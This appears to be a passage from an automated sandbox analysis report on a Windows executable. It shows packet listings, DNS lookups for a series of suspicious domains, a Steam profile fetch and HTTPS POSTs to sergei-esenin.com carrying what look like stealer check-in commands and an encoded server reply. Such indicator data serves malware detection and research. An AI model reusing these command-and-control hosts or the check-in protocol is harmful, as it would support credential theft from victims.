                                                                                                                                                                                Oct 20, 2024 08:39:12.807689905 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.807890892 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.807943106 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.808180094 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.808217049 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.808238029 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.808264017 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.808480978 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.808516026 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.808603048 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.808702946 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.808748960 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.821393013 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.821640968 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.821707010 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:12.821755886 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.821867943 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:12.824418068 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:16.319320917 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:16.319381952 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:16.319468975 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:16.319561005 CEST49737443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:16.319605112 CEST44349737104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:16.332997084 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:16.333051920 CEST44349739104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:16.333405972 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:16.333751917 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:16.333765030 CEST44349739104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:17.112648010 CEST44349739104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:17.112812042 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:17.114758968 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:17.114788055 CEST44349739104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:17.115041018 CEST44349739104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:17.119379997 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:17.119445086 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:17.119524002 CEST44349739104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:17.692681074 CEST44349739104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:17.692747116 CEST44349739104.21.53.8192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:17.692827940 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:17.692898035 CEST49739443192.168.2.4104.21.53.8
                                                                                                                                                                                Oct 20, 2024 08:39:17.692922115 CEST44349739104.21.53.8192.168.2.4

                                                                                                                                                                                UDP Packets

                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                Oct 20, 2024 08:38:59.571722031 CEST5991553192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.580462933 CEST53599151.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.584613085 CEST6367053192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.599909067 CEST53636701.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.602546930 CEST5504953192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.612046957 CEST53550491.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.614173889 CEST5970253192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.624561071 CEST53597021.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.626739979 CEST5135553192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.635792971 CEST53513551.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.636718988 CEST4924153192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.646498919 CEST53492411.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.648118019 CEST6412053192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.657267094 CEST53641201.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.660237074 CEST6254353192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.669545889 CEST53625431.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:38:59.671150923 CEST6048353192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:38:59.679637909 CEST53604831.1.1.1192.168.2.4
                                                                                                                                                                                Oct 20, 2024 08:39:01.734764099 CEST5165153192.168.2.41.1.1.1
                                                                                                                                                                                Oct 20, 2024 08:39:01.751800060 CEST53516511.1.1.1192.168.2.4

                                                                                                                                                                                DNS Queries

                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                Oct 20, 2024 08:38:59.571722031 CEST192.168.2.41.1.1.10xc985Standard query (0)clearancek.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.584613085 CEST192.168.2.41.1.1.10x9da3Standard query (0)mobbipenju.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.602546930 CEST192.168.2.41.1.1.10x1009Standard query (0)eaglepawnoy.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.614173889 CEST192.168.2.41.1.1.10xaadcStandard query (0)dissapoiznw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.626739979 CEST192.168.2.41.1.1.10x565fStandard query (0)studennotediw.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.636718988 CEST192.168.2.41.1.1.10x119Standard query (0)bathdoomgaz.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.648118019 CEST192.168.2.41.1.1.10xdc9bStandard query (0)spirittunek.storeA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.660237074 CEST192.168.2.41.1.1.10x818dStandard query (0)licendfilteo.siteA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.671150923 CEST192.168.2.41.1.1.10x9f25Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:39:01.734764099 CEST192.168.2.41.1.1.10x4186Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false

                                                                                                                                                                                DNS Answers

                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                Oct 20, 2024 08:38:59.580462933 CEST1.1.1.1192.168.2.40xc985Name error (3)clearancek.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.599909067 CEST1.1.1.1192.168.2.40x9da3Name error (3)mobbipenju.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.612046957 CEST1.1.1.1192.168.2.40x1009Name error (3)eaglepawnoy.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.624561071 CEST1.1.1.1192.168.2.40xaadcName error (3)dissapoiznw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.635792971 CEST1.1.1.1192.168.2.40x565fName error (3)studennotediw.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.646498919 CEST1.1.1.1192.168.2.40x119Name error (3)bathdoomgaz.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.657267094 CEST1.1.1.1192.168.2.40xdc9bName error (3)spirittunek.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.669545889 CEST1.1.1.1192.168.2.40x818dName error (3)licendfilteo.sitenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:38:59.679637909 CEST1.1.1.1192.168.2.40x9f25No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:39:01.751800060 CEST1.1.1.1192.168.2.40x4186No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                                                                                                                Oct 20, 2024 08:39:01.751800060 CEST1.1.1.1192.168.2.40x4186No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false

                                                                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                                                                • steamcommunity.com
                                                                                                                                                                                • sergei-esenin.com

                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                0192.168.2.449730104.102.49.2544437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:00 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                2024-10-20 06:39:01 UTC1891INHTTP/1.1 200 OK
                                                                                                                                                                                Server: nginx
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://ste [TRUNCATED]
                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                Date: Sun, 20 Oct 2024 06:39:01 GMT
                                                                                                                                                                                Content-Length: 34508
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: sessionid=af6637e6d5cd8f076664704a; Path=/; Secure; SameSite=None
                                                                                                                                                                                Set-Cookie: steamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                2024-10-20 06:39:01 UTC14493INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                                2024-10-20 06:39:01 UTC16384INData Raw: 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 41 63 63 6f 75 6e 74 20 4d 65
                                                                                                                                                                                Data Ascii: etY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" aria-label="Account Me


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                1192.168.2.449731104.21.53.84437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:02 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 8
                                                                                                                                                                                Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                Data Ascii: act=life
                                                                                                                                                                                2024-10-20 06:39:02 UTC558INHTTP/1.1 403 Forbidden
                                                                                                                                                                                Date: Sun, 20 Oct 2024 06:39:02 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JuaMAjSNvLuGswKX4gwL3ISsU7GnOoH0MZusFU17FC9mbzufQz1G7FfB2N7Y92jiEyom3BtaFgA8Z0QU%2F39MyShlH%2F08IL7HYshTvlUjz98zeevg4wkRztf3156isbPjuHmEgA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8d5702296a0b535b-LAX
                                                                                                                                                                                2024-10-20 06:39:02 UTC811INData Raw: 31 31 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                                                                                                                                                                Data Ascii: 1153<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                                                                                                                                                                2024-10-20 06:39:02 UTC1369INData Raw: 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49
                                                                                                                                                                                Data Ascii: styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementByI
                                                                                                                                                                                2024-10-20 06:39:02 UTC1369INData Raw: 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 63 64 6e 2d 63 67 69 2f 70 68 69 73 68 2d 62 79 70 61 73 73 22 20 6d 65 74 68 6f 64 3d 22 47 45 54 22 20 65 6e 63 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                Data Ascii: management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form action="/cdn-cgi/phish-bypass" method="GET" enctype="text/plain">
                                                                                                                                                                                2024-10-20 06:39:02 UTC894INData Raw: 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20
                                                                                                                                                                                Data Ascii: pan> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing"
                                                                                                                                                                                2024-10-20 06:39:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                2192.168.2.449732104.21.53.84437436C:\Users\user\Desktop\file.exe
                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                2024-10-20 06:39:03 UTC354OUTPOST /api HTTP/1.1
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                Cookie: __cf_mw_byp=bKmBZVeXetEUsJEvqQWppTmgKdLdaxlDFkrWihgCGmQ-1729406342-0.0.1.1-/api
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                Content-Length: 52
                                                                                                                                                                                Host: sergei-esenin.com
                                                                                                                                                                                2024-10-20 06:39:03 UTC52OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 53 44 30 79 34 2d 2d 6c 65 67 65 6e 64 61 72 79 79 26 6a 3d
                                                                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=
                                                                                                                                                                                2024-10-20 06:39:04 UTC1016INHTTP/1.1 200 OK
                                                                                                                                                                                Date: Sun, 20 Oct 2024 06:39:04 GMT
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                Connection: close
                                                                                                                                                                                Set-Cookie: PHPSESSID=af5ga2uj1ikinr5pvfcsapd2u5; expires=Thu, 13 Feb 2025 00:25:43 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                                                vary: accept-encoding
                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OYLP4rLCId8IPPjoehxePUhj0p528CeCBNoXajW3QQ4pZ2ycy0ItoSj1Tah3Wf3D%2FNunh0tsAsvhc97s2pQ%2FL1gUldJjRPUEWblhbWZK79kSLTtPx9N0jnt7HiW%2BvAe4Hd1wqg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                CF-RAY: 8d570230f990101b-LAX
                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1557&sent=4&recv=5&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1042&delivery_rate=1885416&cwnd=187&unsent_bytes=0&cid=73d3839ef3c74bae&ts=804&x=0"
                                                                                                                                                                                2024-10-20 06:39:04 UTC353INData Raw: 63 64 33 0d 0a 55 57 35 52 42 37 64 64 6e 62 4d 55 52 47 6b 79 2f 66 2f 32 54 4b 6c 33 57 41 39 33 6f 49 69 6b 59 43 78 79 51 4c 4a 4e 31 54 41 71 54 43 63 6c 6a 57 6d 78 6b 57 63 68 53 77 69 4a 6a 59 4d 70 68 56 55 35 61 31 57 61 37 73 55 4d 58 78 64 73 6b 44 75 34 45 6d 73 49 4d 47 76 45 4f 4c 47 52 63 54 78 4c 43 4b 61 45 31 43 6e 48 56 57 49 74 45 73 72 71 78 51 78 4f 45 79 76 64 50 62 6c 54 4f 51 49 32 62 39 49 2b 2b 64 4a 34 4b 51 78 58 6d 4a 36 63 49 73 41 61 4d 47 4a 56 6a 4b 72 42 47 67 35 49 59 76 38 6f 6f 56 45 63 44 79 4a 73 6c 53 43 78 79 44 59 68 42 78 44 48 33 5a 63 70 79 78 73 2b 61 78 7a 49 34 4d 77 45 54 78 59 71 77 69 53 7a 57 44 6b 4d 4e 57 37 59 4e 2b 33 66 63 69 34 48 55 5a 4b 65 31 47 43 4c 45 69 49 74 54 59 4b 35 39 41 46 66 41 54
                                                                                                                                                                                Data Ascii: cd3UW5RB7ddnbMURGky/f/2TKl3WA93oIikYCxyQLJN1TAqTCcljWmxkWchSwiJjYMphVU5a1Wa7sUMXxdskDu4EmsIMGvEOLGRcTxLCKaE1CnHVWItEsrqxQxOEyvdPblTOQI2b9I++dJ4KQxXmJ6cIsAaMGJVjKrBGg5IYv8ooVEcDyJslSCxyDYhBxDH3Zcpyxs+axzI4MwETxYqwiSzWDkMNW7YN+3fci4HUZKe1GCLEiItTYK59AFfAT
                                                                                                                                                                                2024-10-20 06:39:04 UTC1369INData Raw: 4d 76 2f 44 66 69 30 41 56 59 32 57 6e 53 50 47 46 54 64 6e 47 73 48 71 77 51 68 45 48 79 6a 55 49 72 70 55 4d 77 78 7a 4b 35 55 34 35 35 45 75 5a 69 68 56 6a 35 71 59 4f 49 6b 76 65 6e 4a 62 32 36 72 42 44 67 35 49 59 74 67 71 74 46 45 34 41 7a 42 74 33 69 33 2f 77 33 41 72 44 6b 4b 5a 6d 4a 6f 6b 79 41 63 77 59 78 50 42 34 38 30 4c 53 78 63 6d 6b 47 48 33 56 53 74 4d 61 79 58 30 4d 76 54 64 66 44 45 4c 45 49 44 54 6a 57 37 4d 47 58 6f 31 56 63 62 72 77 67 4e 4b 48 69 7a 55 49 37 46 63 50 67 4d 31 62 39 55 34 39 64 6c 2b 4a 77 5a 62 6b 4a 32 52 49 38 38 54 4e 6d 77 51 67 71 53 47 42 56 5a 51 65 70 41 42 73 46 45 68 54 67 5a 6d 32 7a 48 34 78 7a 59 35 52 55 6e 66 6d 70 68 75 6b 31 55 30 61 42 72 51 36 39 51 48 51 41 49 75 31 53 6d 36 55 54 30 4d 4e 6d 4c
